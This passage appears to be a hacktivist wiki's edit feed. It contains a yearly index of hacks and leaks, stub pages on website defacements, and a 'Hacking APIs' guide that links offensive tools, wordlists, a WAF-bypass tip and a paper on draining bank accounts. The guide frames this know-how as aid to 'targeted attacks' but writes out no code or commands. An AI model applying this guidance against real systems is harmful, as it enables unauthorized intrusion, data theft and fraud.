* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;br /&gt;
&lt;br /&gt;
== 2024 ==&lt;br /&gt;
* [[SiegedSec - #OpTransRights2 ]]&lt;br /&gt;
* [[The Post Millennial]]&lt;br /&gt;
* [[Cyber Partisans - FSB]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1750</id>
		<title>Hacking APIs</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacking_APIs&amp;diff=1750"/>
		<updated>2024-05-05T11:43:50Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Intercepting proxies */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Web Application Programming Interfaces (APIs) make up [https://www.akamai.com/blog/security/api-discovery-and-profiling-visibility-to-protection 83% of all web traffic] and [https://www.ibm.com/downloads/cas/WMDZOWK6 two thirds of all cloud breaches are due to misconfigured APIs] with developers hard coding credentials and exposing API keys. Organizations are using them more and more to deliver content, handle and transfer data and to implement more functionality into their services and web applications, not to mention APIs have direct back-end database access. Knights [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf white paper] show cases how web APIs can be exploited via [https://owasp.org/www-project-api-security API1:2023 - Broken Object Level Authorization (BOLA)] vulnerability to transfer money in and out of bank accounts and change Visa ATM debit PIN codes. Exploiting web APIs has also been a vector for a lot of [https://www.linkedin.com/pulse/api-exploitation-leading-cause-modern-day-data-gameli-mawudor-phd data breaches].&lt;br /&gt;
&lt;br /&gt;
Currently there is a severe lack of security testing against APIs (mobile APIs especially) from the white hats, not a lot of efforts in testing and protecting APIs and typically organizations &amp;quot;protect&amp;quot; their APIs using WAFs which are ineffective at defending APIs as they are designed to protect web applications and not logic-based exploits. &lt;br /&gt;
&lt;br /&gt;
The top 3 most commonly used web APIs used today (2023) are: Rest, GraphQL and SOAP. Common API data transfer formats are: JSON, XML and YAML. It&#039;s an easier attack vector (for now). Learn how to hack web APIs to facilitate your targeted attacks!&lt;br /&gt;
&lt;br /&gt;
See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon Scanning and Recon], [https://enlacehacktivista.org/index.php?title=Search_Engines_Resources Search Engines],  [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures Initial Access Tactics, techniques and procedures] and a [https://youtu.be/FqnSAa2KmBI hackers methodology] and [https://youtu.be/p4JgIu1mceI recon] as prerequisite&#039;s to hacking APIs.&lt;br /&gt;
&lt;br /&gt;
== Prerequisite reading ==&lt;br /&gt;
* OWASP API Security Top 10: https://owasp.org/www-project-api-security | https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf&lt;br /&gt;
* (Book) Hacking APIs: Breaking Web Application Programming Interfaces&lt;br /&gt;
* (Book) Black Hat GraphQL: Attacking Next Generation APIs&lt;br /&gt;
* API Whitepapers and reports: https://salt.security/resources&lt;br /&gt;
* (Book) Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities (Chapter 24 - API Hacking)&lt;br /&gt;
* SCORCHED EARTH: [https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf HACKING BANKS AND CRYPTOCURRENCY EXCHANGES THROUGH THEIR APIS]&lt;br /&gt;
* Exploiting GraphQL: https://blog.assetnote.io/2021/08/29/exploiting-graphql&lt;br /&gt;
* HackTricks - GraphQL: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql&lt;br /&gt;
&lt;br /&gt;
== Testing environments ==&lt;br /&gt;
* Completely ridiculous API (crAPI) - Purposefully vulnerable API: https://github.com/OWASP/crAPI&lt;br /&gt;
* Damn Vulnerable GraphQL Application - Intentionally vulnerable GraphQL API: https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application&lt;br /&gt;
* OWASP Juice Shop - Insecure web application (uses Rest APIs): https://github.com/juice-shop/juice-shop&lt;br /&gt;
* The Pixi module is a MEAN Stack web app with wildly insecure APIs!: https://github.com/DevSlop/Pixi&lt;br /&gt;
* Vulnerable REST API with OWASP top 10 vulnerabilities for security testing: https://github.com/erev0s/VAmPI&lt;br /&gt;
&lt;br /&gt;
=== Labs ===&lt;br /&gt;
* HackTheBox (HTB) Academy: [https://academy.hackthebox.com/course/preview/web-service--api-attacks Web Service &amp;amp; API Attacks] [Paid]&lt;br /&gt;
* TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop105w OWASP API Security Top 10 - 1] [Paid]&lt;br /&gt;
** TryHackMe (THM): [https://tryhackme.com/room/owaspapisecuritytop10d0 OWASP API Security Top 10 - 2] [Paid]&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
* A collection of API Security tools and resources: https://github.com/arainho/awesome-api-security&lt;br /&gt;
* A comprehensive API hacking framework (A-Z)! MindAPI: https://dsopas.github.io/MindAPI/play&lt;br /&gt;
* Decode JSON Web Tokens (Online): https://jwt.io&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token JWT - JSON Web Token]&lt;br /&gt;
* A toolkit for testing, tweaking and cracking JSON Web Tokens: https://github.com/ticarpi/jwt_tool&lt;br /&gt;
* Obtain GraphQL API schema even if the introspection is disabled: https://github.com/nikitastupin/clairvoyance&lt;br /&gt;
* HTTP parameter discovery suite: https://github.com/s0md3v/Arjun&lt;br /&gt;
* NSE Script for GraphQL Introspection Check: https://github.com/dolevf/nmap-graphql-introspection-nse&lt;br /&gt;
* graphw00f is GraphQL Server Engine Fingerprinting utility: https://github.com/dolevf/graphw00f&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection GraphQL Injection]&lt;br /&gt;
* GraphQL Introspection analyzer: https://github.com/gwen001/graphql-introspection-analyzer&lt;br /&gt;
* If you have found API keys perhaps in a JavaScript file but are not sure how to test their validity use keyhacks: https://github.com/streaak/keyhacks&lt;br /&gt;
&lt;br /&gt;
=== Intercepting proxies ===&lt;br /&gt;
These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications, mobile and APIs.&lt;br /&gt;
* https://www.usebruno.com (API focused)&lt;br /&gt;
* https://portswigger.net/burp (If a WAF is blocking Burpsuite then [https://stackoverflow.com/questions/70129432/how-to-bypass-cloudflare-protection-with-burp try editing your user-agent string])&lt;br /&gt;
* https://www.zaproxy.org | [https://www.zaproxy.org/blog/2020-08-28-introducing-the-graphql-add-on-for-zap GraphQL Add-on for ZAP] to exploit GraphQL Introspection.&lt;br /&gt;
&lt;br /&gt;
=== Fuzzing ===&lt;br /&gt;
* https://github.com/assetnote/kiterunner (API focused)&lt;br /&gt;
* https://github.com/ffuf/ffuf&lt;br /&gt;
* https://www.kali.org/tools/wfuzz&lt;br /&gt;
&lt;br /&gt;
==== Wordlists ====&lt;br /&gt;
[https://github.com/assetnote/kiterunner Kiterunner] word lists:&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt&lt;br /&gt;
Web API specific word lists:&lt;br /&gt;
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d&lt;br /&gt;
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist&lt;br /&gt;
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs&lt;br /&gt;
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it&#039;s still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=The_Post_Millennial&amp;diff=1749</id>
		<title>The Post Millennial</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=The_Post_Millennial&amp;diff=1749"/>
		<updated>2024-05-04T00:24:50Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:The_Post_Millennial.jpeg|1000px|border|#The Post Millennial Defacement]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* Defacement archive: https://archive.is/GymQj&lt;br /&gt;
* https://x.com/vxunderground/status/1786266989947703552&lt;br /&gt;
* https://en.wikipedia.org/wiki/The_Post_Millennial&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=SiegedSec_-&amp;diff=1748</id>
		<title>SiegedSec -</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=SiegedSec_-&amp;diff=1748"/>
		<updated>2024-05-04T00:05:04Z</updated>

		<summary type="html">&lt;p&gt;Booda: Inclusion of media links to relevant sources&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://x.com/SiegedSecurity/status/1779995926163272032&lt;br /&gt;
* https://x.com/SiegedSecurity/status/1785028574472495463&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=The_Post_Millennial&amp;diff=1747</id>
		<title>The Post Millennial</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=The_Post_Millennial&amp;diff=1747"/>
		<updated>2024-05-03T23:51:01Z</updated>

		<summary type="html">&lt;p&gt;Booda: The Post Millennial HackBack&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:The_Post_Millennial.jpeg|1000px|border|#The Post Millennial Defacement]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://x.com/vxunderground/status/1786266989947703552&lt;br /&gt;
* https://en.wikipedia.org/wiki/The_Post_Millennial&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=File:The_Post_Millennial.jpeg&amp;diff=1746</id>
		<title>File:The Post Millennial.jpeg</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=File:The_Post_Millennial.jpeg&amp;diff=1746"/>
		<updated>2024-05-03T23:48:24Z</updated>

		<summary type="html">&lt;p&gt;Booda: The Post Millennial conservative website hacked by trans hacktivists&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
The Post Millennial conservative website hacked by trans hacktivists&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1745</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1745"/>
		<updated>2024-05-03T23:46:52Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2024 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
* [[TheGEOGroup]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;br /&gt;
&lt;br /&gt;
== 2024 ==&lt;br /&gt;
* [[SiegedSec - #OpTransRights2 ]]&lt;br /&gt;
* [[The Post Millennial]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=TheGEOGroup&amp;diff=1744</id>
		<title>TheGEOGroup</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=TheGEOGroup&amp;diff=1744"/>
		<updated>2024-04-16T19:10:32Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
[[File:TheGEOGroupDefaced.jpeg|600px|border|#Antisec defacement]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://en.wikipedia.org/wiki/GEO_Group&lt;br /&gt;
* https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473&lt;br /&gt;
* https://x.com/FreeJeremyNet/status/1629970249893437440&lt;br /&gt;
* https://zone-h.org/mirror/id/17107967&lt;br /&gt;
* https://zone-h.org/mirror/id/17108961&lt;br /&gt;
* https://zone-h.org/mirror/id/17107978&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=SiegedSec_-&amp;diff=1743</id>
		<title>SiegedSec -</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=SiegedSec_-&amp;diff=1743"/>
		<updated>2024-04-16T19:07:55Z</updated>

		<summary type="html">&lt;p&gt;Booda: Created blank page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=TheGEOGroup&amp;diff=1742</id>
		<title>TheGEOGroup</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=TheGEOGroup&amp;diff=1742"/>
		<updated>2024-04-16T19:07:02Z</updated>

		<summary type="html">&lt;p&gt;Booda: Created page with &amp;quot; #Antisec defacement  == References == * https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473 * https://x.com/FreeJeremyNet/status/1629970249893437440 * https://zone-h.org/mirror/id/17107967 * https://zone-h.org/mirror/id/17108961 * https://zone-h.org/mirror/id/17107978&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
[[File:TheGEOGroupDefaced.jpeg|600px|border|#Antisec defacement]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* https://www.huffpost.com/entry/anonymous-hacks-private-prison-company_n_1300473&lt;br /&gt;
* https://x.com/FreeJeremyNet/status/1629970249893437440&lt;br /&gt;
* https://zone-h.org/mirror/id/17107967&lt;br /&gt;
* https://zone-h.org/mirror/id/17108961&lt;br /&gt;
* https://zone-h.org/mirror/id/17107978&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=File:TheGEOGroupDefaced.jpeg&amp;diff=1741</id>
		<title>File:TheGEOGroupDefaced.jpeg</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=File:TheGEOGroupDefaced.jpeg&amp;diff=1741"/>
		<updated>2024-04-16T18:58:53Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1740</id>
		<title>Hacker History</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Hacker_History&amp;diff=1740"/>
		<updated>2024-04-16T18:52:03Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* 2012 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 2005 ==&lt;br /&gt;
* [[Protest Warrior]]&lt;br /&gt;
&lt;br /&gt;
== 2008 ==&lt;br /&gt;
* [[Sarah Palin emails]]&lt;br /&gt;
&lt;br /&gt;
== 2010 ==&lt;br /&gt;
* [[SRS Electronic Declaration System]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
&lt;br /&gt;
== 2011 ==&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[LeakyMails]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[RedHack]]&lt;br /&gt;
* [[LulzSec Sony]]&lt;br /&gt;
&lt;br /&gt;
== 2012 ==&lt;br /&gt;
* [[Apple UDIDs]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Syria emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[CabinCr3w]]&lt;br /&gt;
* [[TheGEOGroup]]&lt;br /&gt;
&lt;br /&gt;
== 2013 ==&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
&lt;br /&gt;
== 2014 ==&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
&lt;br /&gt;
== 2015 ==&lt;br /&gt;
* [[wikipedia:Football Leaks]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
&lt;br /&gt;
== 2016 ==&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Panama Papers]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Catalan police union]]&lt;br /&gt;
&lt;br /&gt;
== 2017 ==&lt;br /&gt;
* [[Bob Otto emails]]&lt;br /&gt;
* [[Cellebrite]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Freedom Hosting II]]&lt;br /&gt;
&lt;br /&gt;
== 2018 ==&lt;br /&gt;
* [[Salvini emails]]&lt;br /&gt;
* [[Doxxing-Adventskalender]]&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
* [[GorraLeaks]]&lt;br /&gt;
* [[Paco Leaks]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Capital One]]&lt;br /&gt;
* [[GdP (Hambacher Forest)]]&lt;br /&gt;
* [[Perceptics]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Iron March]]&lt;br /&gt;
* [[Varela Leaks]]&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[BlueLeaks]]&lt;br /&gt;
* [[Intel exconfidential Lake]]&lt;br /&gt;
&lt;br /&gt;
== 2021 ==&lt;br /&gt;
* [[Gab]]&lt;br /&gt;
* [[Myanmar Investments]]&lt;br /&gt;
* [[American Patriots Three Percent‎]]&lt;br /&gt;
* [[Verkada]]&lt;br /&gt;
* [[Sons of Confederate Veterans]]&lt;br /&gt;
* [[MagaCoin]]&lt;br /&gt;
* [[Electronic Arts]]&lt;br /&gt;
* [[Tea Party Patriots]]&lt;br /&gt;
* [[Cyber Partisans]]&lt;br /&gt;
* [[HART]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Oath Keepers]]&lt;br /&gt;
* [[America&#039;s Frontline Doctors]]&lt;br /&gt;
* [[Twitch]]&lt;br /&gt;
* [[Attila Hildmann‎]]&lt;br /&gt;
* [[Metropolitan Police Department D.C.]]&lt;br /&gt;
* [[Academy of Public Administration (Belarus)]]&lt;br /&gt;
* [[AnibalLeaks]]&lt;br /&gt;
* [[Texas GOP]]&lt;br /&gt;
&lt;br /&gt;
== 2022 ==&lt;br /&gt;
* [[Myanmar Internal Revenue Department]]&lt;br /&gt;
* [[Patriot Front]]&lt;br /&gt;
* [[Belarusian Railway]]&lt;br /&gt;
* [[Pronico]]&lt;br /&gt;
* [[Roskomnadzor]]&lt;br /&gt;
* [[OpRussia]]&lt;br /&gt;
* [[Nauru Police Force]]&lt;br /&gt;
* [[Extractivist Leaks/es]]&lt;br /&gt;
* [[Uber]]&lt;br /&gt;
* [[Liberty Counsel]]&lt;br /&gt;
* [[Fiscalia|Fiscalia of Colombia]]&lt;br /&gt;
* [[Fuerzas Represivas]]&lt;br /&gt;
* [[InfraGard]]&lt;br /&gt;
&lt;br /&gt;
== 2023 ==&lt;br /&gt;
* [[Odin Intelligence]]&lt;br /&gt;
* [[TSA No Fly List]]&lt;br /&gt;
* [[SiegedSec NATO]]&lt;br /&gt;
* [[LetMeSpy]]&lt;br /&gt;
* [[Greater Manchester Police (GMP)]]&lt;br /&gt;
* [[RedAlert]]&lt;br /&gt;
* [[WebDetetive]]&lt;br /&gt;
* [[SpyHide]]&lt;br /&gt;
* [[Rules of engagement - Red Cross]]&lt;br /&gt;
&lt;br /&gt;
== 2024 ==&lt;br /&gt;
* [[SiegedSec - #OpTransRights2 ]]&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
